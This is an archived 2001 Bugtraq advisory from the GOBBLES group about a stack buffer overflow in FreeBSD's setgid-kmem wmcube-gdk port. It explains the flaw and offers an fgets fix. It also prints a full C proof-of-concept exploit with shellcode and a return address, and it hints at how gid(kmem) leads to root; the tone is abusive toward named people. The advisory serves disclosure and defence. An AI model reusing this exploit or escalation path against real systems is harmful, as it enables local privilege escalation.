Hello everyone. GOBBLES Labs proudly presents yet another advisory + exploit. Today's product is wmcube-gdk, which is sgid(kmem) after installation from FreeBSD's Ports collection. After successful exploitation of the bug, gaining root privilages is trivial. See attached advisory for details. GOBBLES Labs http://www.bugtraq.org ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++ ALERT! ALERT! FREEBSD LOCAL ROOT VULNERABILITY! ALERT! ALERT! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #include "/var/spool/uucppublic/.gbbls/note.h" "Love doesn't make the world go 'round, love is what makes the ride worthwhile." Alicia is in love!!! ---^ GOBBLES and he group do proudly present advisory on local root hole in FreeBSD that can also work for the Linux, but GOBBLES did find hole when doing comprehensive ports audit. GOBBLES didn't see any real need to waste time on crappy program exploits for other operating systems and suspect this one is enough to teach programmer timecop lesson in manners and one in humility. PRODUCT ******* Program: -r-xr-sr-x 1 root kmem 20376 Dec 17 11:28 /usr/X11R6/bin/wmcube-gdk FreeBSD port: /usr/ports/sysutils/wmcube-gdk Author WWW: http://www.ne.jp/asahi/linux/timecop/ BACKGROUND ********** GOBBLES crack he knuckles as he prepare to exercise copy/paste talent then does submit the following to eyes of eager readers: WMCube / GDK This is modified and optimized version of wmCube 0.98, originally available at this website. Changes include much faster redraws, significantly lower CPU usage, ability to specify color for both flat-shaded and wireframe objects, and transparent CPU load / zoom buttons. Sorry, the "roll-in" sequence of original wmCube has been removed. But with all these cool new features it's unlikely you are going to miss it too long :) wmCube author is too busy to look over my changes, so I am making them available here, with his approval :) Note, Makefiles for systems other than Linux will need to be modified to use gdk libraries. Check out README.GDK inside the tarball for some hints where to start. If you make changes for your system, please send me updated Makefile. Thank you. PROBLEM ******* GOBBLES notice user can specify object description file which overflow small buffer which then transform wmcube-gdk into swiss army knife with gid(kmem) privs. For all critics who say, "this not root if it only gid(kmem)!" GOBBLES say, "Go back to security-basic mailing list to learn trick for quickly becoming uid(root) on the FreeBSD and other OS when you have gid(kmem). GOBBLES think that all people who quick to criticize GOBBLES when all he really doing is saying things in tricky way to invite criticism from ignorant so that GOBBLES can mock them are just complete idiots who spend way too much time trying to get three years of "security experience" so they can go take 250 question CISSP test and then let the world know on mailing lists that they have elite whitehat pussy ethical hacker with no skill certification (which is what CISSP stand for). Anyhow, you idiots know who you are, and beware that any mockery of GOBBLES by inexperienced and unskilled critics who brag certifications will not be accepted, dummies. Hehehe GOBBLES got off on a little dark tangent from he speech and will now get back to original subject, which is local root exploit in wmcube-gdk. Funny thing that GOBBLES did notice is that wmcube program that wmcube-gdk is based off is not vulnerable to this bug (but is to others, go do sourcecode audit before GOBBLES make monkey out of you!), so the fault is entirely belonging to programmer timecop... encourage him to stop writing code with silly beginner style mistakes. Stupid mistakes made by stupid beginner programmer. VENDOR NOTIFICATION STATUS ************************** GOBBLES first do privmsg timecop: identify tricks on efnet with long string to see who make right rules for Ettercap exploit (snort.org official ones worthless, but idiot criticize us!) hehe then GOBBLES did proceed to try and discuss issue with programmer timecop but did not get any response from selfrighteous bastard so oh well GOBBLES not really caring to help anymore. Important for software programmers to all be active subscribers and contributers to securityfocus.com mailing lists so they can find out about earthshattering bugs that indirectly affect their code and then can go audit and fix new bugs, understand what GOBBLES wants you developers all to do? TECHNICAL DETAILS ***************** Here problem GOBBLES did spot in wmcube.c, in the function loadobj(). int loadobj(char *filename) { FILE *fp; char tmp[64] = { "" }; int i = 0, counter = 1; 10: ... fscanf(fp, "%s", tmp); ... goto 10; } As you can see, programmer pick to chose data in 64 bytes small buffer, which is OK but the problem is the fscanf(fp, "s", tmp); trick used multiple times in code he make of loadobj(). Bad decision by newbie programmer who do not understand that penetrator can specify own object description file with -o argument and put long lines in it and then overflowing 64 byte buffer! Good thing GOBBLES catch all bugs in software, hehe! WORKAROUND ********** [0x01] Shutdown your computer until a official fix is available.. ..OR.. [0x02] Replace fscanf(fp, "%s", tmp); in loadobj(), wmcube.c with fgets(tmp, 64, fp);. Then uninstall bad wmcube-gdk, recompile and do a new install! DEMONSTRATION ************* GOBBLES do some more copy/paste acrobatics to show better idea of how this vulnerability exists and stuff. <snip> ===> Registering installation for wmcube-gdk-0.98p1 ===> SECURITY NOTE: This port has installed the following binaries which execute with increased privileges. 667014 40 -r-xr-sr-x 1 root kmem 20376 Dec 17 09:43 /usr/X11R6/bin/wmcube-gdk If there are vulnerabilities in these programs there may be a security risk to the system. FreeBSD makes no guarantee about the security of ports included in the Ports Collection. Please type 'make deinstall' to deinstall the port if this is a concern. For more information, and contact details about the security status of this software, see the following webpage: http://www.ne.jp/asahi/linux/timecop/ </snip> GOBBLES@freegobbles:~$ ./GOBBLESwmc # GOBBLES whitehat PoC exploit GOBBLES! uid=1001(GOBBLES) gid=1001(GOBBLES) groups=1001(GOBBLES), 2(kmem) GOBBLES@freegobbles:~$ As you can see, GOBBLES had Andrew write pussy whitehat style PoC exploit to keep penetrators from using it maliciously (GOBBLES certain this futile effort to keep weapons out of penetrator hands though, since someone will undoubtedly "fix" exploit then republish it showing how smart they are for being able to "fix" simple things, idiots not understanding the reason for distributing in PoC format). CONCLUSION ********** Since there is security vulnerability in sgid kmem program GOBBLES decide to deinstall package so no evil penetrators may sneak into GOBBLES private kernel memory$!@#%. root@freegobbles:/usr/ports/sysutils/wmcube-gdk# make deinstall ===> Deinstalling for wmcube-gdk-0.98p1 root@freegobbles:/usr/ports/sysutils/wmcube-gdk# Now, GOBBLES feels much safer, hehehe. So, what GOBBLES learn this time? Fancy program might not be secure! Similar to philosophy of writing exploits in penetrator program Ettercap, but slightly different since wmcube-gdk just fancy program, and not evil penetrator program, hehe. POC EXPLOIT *********** This hole give root indirectly after getting gid(kmem). GOBBLES suggest trying strings in memory to find master.password then using Mickey Mouse Hacking Squadron UnicOS exploits to gain root on Cray's to do password cracking to get root, then do su root - trick to get root on machine. From GOBBLES extensive research into subject matter of root password he find that most FreeBSD root password are "love", but that is not GOBBLES root password so do not even try, hehe! This time GOBBLES choose to not include shellcode that execve() /bin/bash so FreeBSD admin can feel safe until author patches he program! /* * (c) Andrew / GOBBLES Security * * PoC exploit for wmcube-gdk * * Usage: /path/to/GOBBLES-wmcube-gdk-exploit [offset] * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> unsigned char GOBBLES_shellcode[] = "\xb8\xf5\xf5\xff\xff\xf7\xd0\x50\xb8\xb3\xba\xac\xde\xf7\xd0\x50" "\xb8\xb8\xb0\xbd\xbd\xf7\xd0\x50\x89\xe6\x31\xc0\x31\xdb\xb0\xf5" "\xf6\xd0\x50\x56\x53\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80"; int main(int argc, char **argv) { FILE *fd; int i; u_long retaddy = 0xbfbff634; if(argc == 2) retaddy += atoi(argv[1]); fd = fopen(".gobbles", "wt"); fprintf(fd, "WMCUBE_COORDINATES\n"); fprintf(fd, "1aaa"); // atoi().. for(i = 0; i < 64; i += 8) fprintf(fd, "GOBBLES!"); printf("GOBBLES: Using %lx as retaddy\n", retaddy); fflush(NULL); fwrite(&retaddy, 4, 1, fd); fprintf(fd, "GOBBLES!"); fprintf(fd, "GOBBLES!"); fprintf(fd, "%s", GOBBLES_shellcode); fprintf(fd, " 0 -42 42\n"); fprintf(fd, "WMCUBE_LINES\n"); fprintf(fd, "1 1\n"); fclose(fd); execl("/usr/X11R6/bin/wmcube-gdk", "wmcube-gdk", "-o", ".gobbles", 0); unlink(".gobbles"); /* Mum always told me to cleanup when im done! */ fprintf(stderr, "System immune against GOBBLES exploit!\n"); return 0; } GREETS ****** dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble, knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org, blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet, bugtraq (thanks aleph1 and david ahmad for devoting your time to a great list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley, manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens, radiohead, george michael, larry wall, beethoven, francis bacon, bruce willis, bruce schneier, alan turing, john von neumann, donald knuth, michael abrash, robert sedgewick, richard simmons, government boy, ralph lauren, kevin mitnick, david koresh, the violent femmes, legions of doom, quentin tarantino, JUPES, security.nnov.ru, dugsong, wayne gretzky, hhp-programming.net, so1o, the HaX0R bRoThErS, nasa.gov, alfred hitchcock, ray bradbury, linux torvalds, alyssa milano, sarah michelle geller, jennifer lopez, catherine zeta jones, robert de niro, plato, leonardo da vinci, nostradamus, adam weishaupt, adema, kmfdm, eliphas levi, john dee, goo goo dolls, savage garden, george bush, john howard, tony blair, ashida kim, andrew tanenbaum, comp.lang.c, solar designer, patanjali, vayu siddhi, deepak chopra, ajna chakra, fuzzy bunny, lockdown, bronc buster, attrition.org, cliff stoll, bill gates, alan cox, george harrison, berkeley.edu, microsoft.com, isox, american mcgee, princess toadstool, ru paul, sharon stone, taeho oh, napster, nocarrier, steve wozniak, captian crunch, tony the tiger, julliette lewis, oliver twist, yakko, wakko (but no dot), santa claus, the easter bunny, the christmas tree, hacktech.org, mixter and the rest of #darknet/2xs, the planet Pluto, pluto the dog (from walt disney), walt disney, the smurfs, packetstormsecurity.org, chocolate, caramel, marshmallows, rice crispies, rice crispie treats, cousin WOBBLES, rfp, Alan@packetstorm, george bush senior, george w. bush, his drunken daughters, gary coleman, fat albert, rhino9, eEye.com (hehe good work on application firewall thing or whatever), the djali zwan, digital unix, o'reilly & associates (smart folk selling sketches on cover of book filled with printed manpages with little bit of funny jokes, hehe they rich now), hwa-security.net, #malvu/efnet, donkey kong, diddy kong, p diddy (GOBBLES not understand the english in this name? but he good artist anyway), mr. peanut, all girls who pose naked on webcam for GOBBLES, mr goldilocks (you memory live on forever, old chum), checkpoint.com (thank you for free stuff like nice new shirt and pen and golf tees that all say Checkpoint, hehe), whoever invented deoderant, monkey.org, and all our friends and family. GOBBLES SECURITY http://www.bugtraq.org/
This archive was generated by hypermail 2b30 : Mon Dec 17 2001 - 15:54:23 PST